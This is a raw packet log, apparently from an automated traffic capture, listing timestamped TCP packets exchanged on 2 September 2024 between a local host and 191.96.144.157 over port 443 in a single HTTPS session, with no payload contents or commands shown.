Sep 2, 2024 11:42:53.010927916 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.010952950 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.011058092 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.011102915 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.011107922 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.011133909 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.011178017 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.011183977 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.011199951 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.011271000 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.011318922 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.011324883 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.011372089 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.011396885 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.011451006 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.011450052 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.011473894 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.011502028 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.011521101 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.011637926 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.011694908 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.011713982 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.011765957 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.011861086 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.011912107 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.011919022 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.011924028 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.011965036 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.012059927 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.012108088 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.012120962 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.012125969 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.012164116 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.012178898 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.012299061 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.012326002 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.012350082 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.012356043 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.012382030 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.012386084 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.012399912 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.012403965 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.012455940 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.012639999 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.012691021 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.012816906 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.012854099 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.012868881 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.012873888 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.012900114 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.012917995 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.012995005 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.013042927 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.013087034 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.013130903 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.013144016 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.013195038 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.094289064 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.094357967 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.094363928 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.094381094 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.094392061 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.094413996 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.094435930 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.094468117 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.094507933 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.094512939 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.094521046 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.094544888 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.094547987 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.094592094 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.094599009 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.094640017 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.094691038 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.094723940 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.094742060 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.094748020 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.094769001 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.094790936 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.094844103 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.094898939 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.094953060 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.094985962 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.095006943 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.095011950 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.095024109 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.095098972 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.095146894 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.095151901 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.095184088 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.095206022 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.095212936 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.095230103 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.095309973 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.095340967 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.095365047 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.095371962 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.095382929 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.095447063 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.095490932 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.095498085 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.095539093 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.095561028 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.095609903 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.095621109 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.095674992 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.095696926 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.095746040 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.095755100 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.095762968 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.095793962 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.095810890 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.095871925 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.095953941 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.096000910 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.096050978 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.096087933 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.096096992 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.096101999 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.096126080 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.096146107 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.096205950 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.096256971 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.096952915 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.097012043 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.097012997 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.097023010 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.097071886 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.097142935 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.097183943 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.097193956 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.097204924 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.097225904 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.097331047 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.097371101 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.097378016 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.097383976 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.097410917 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.137651920 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.178373098 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.178416967 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.178451061 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.178453922 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.178463936 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.178483009 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.178512096 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.178535938 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.178585052 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.178627968 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.178682089 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.178745031 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.178783894 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.178808928 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.178814888 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.178823948 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.178864002 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.178919077 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.178925037 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.178951025 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.178972006 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.178978920 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.179002047 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.179059982 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.179097891 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.179126978 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.179132938 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.179157019 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.179160118 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.179203033 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.179208040 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.179234982 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.179246902 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.179253101 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.179285049 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.179382086 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.179421902 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.179435015 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.179442883 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.179471016 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.179610014 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.179652929 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.179658890 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.179665089 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.179698944 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.179703951 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.179711103 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.179744005 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.179775953 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.179826021 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.179927111 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.179971933 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.179997921 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.180001974 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.180011988 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.180032015 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.180032015 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.180063009 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.180162907 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.180222034 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.180238962 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.180293083 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.180355072 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.180408001 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.180412054 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.180438042 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.180466890 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.180478096 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.181140900 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.181190968 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.181277990 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.181327105 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.181334972 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.181346893 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.181374073 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.181504965 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.181546926 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.181557894 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.181564093 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.181582928 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.181596041 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.181634903 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.181639910 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.181679010 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.262666941 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.262723923 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.262767076 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.262808084 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.262819052 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.262825012 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.262854099 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.262861013 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.262902021 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.262907028 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.262917995 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.262948036 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.262958050 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.262970924 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.262993097 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.263001919 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.263026953 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.263032913 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.263042927 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.263135910 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.263175011 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.263180971 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.263186932 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.263228893 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.263278008 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.263325930 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.263418913 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.263461113 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.263468027 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.263473034 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.263503075 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.263505936 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.263524055 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.263529062 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.263556957 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.263560057 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.263612986 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.263618946 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.263657093 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.263690948 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.263742924 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.263746977 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.263753891 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.263777018 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.263784885 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.263804913 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.263808966 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.263834000 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.263927937 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.263988972 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.263995886 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.264041901 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.264043093 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.264054060 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.264098883 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.264103889 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.264113903 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.264152050 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.264157057 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.264166117 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.264197111 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.264281988 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.264317036 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.264348984 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.264353991 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.264368057 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.264379978 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.264415026 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.264419079 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.264458895 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.264575005 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.264616013 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.264627934 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.264633894 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.264656067 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.264672995 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.265294075 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.265342951 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.265405893 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.265450001 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.265463114 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.265469074 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.265501976 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.265506029 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.265554905 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.265561104 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.265583038 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.265614033 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.265619040 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.265638113 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.265647888 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.265691042 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.265695095 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.265739918 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.348893881 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.348953962 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.348959923 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.348968983 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.349011898 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.349013090 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.349025965 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.349056959 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.349076986 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.349127054 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.349128008 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.349138021 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.349176884 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.349180937 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.349230051 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.349231005 CEST	49763	443	192.168.2.4	191.96.144.157
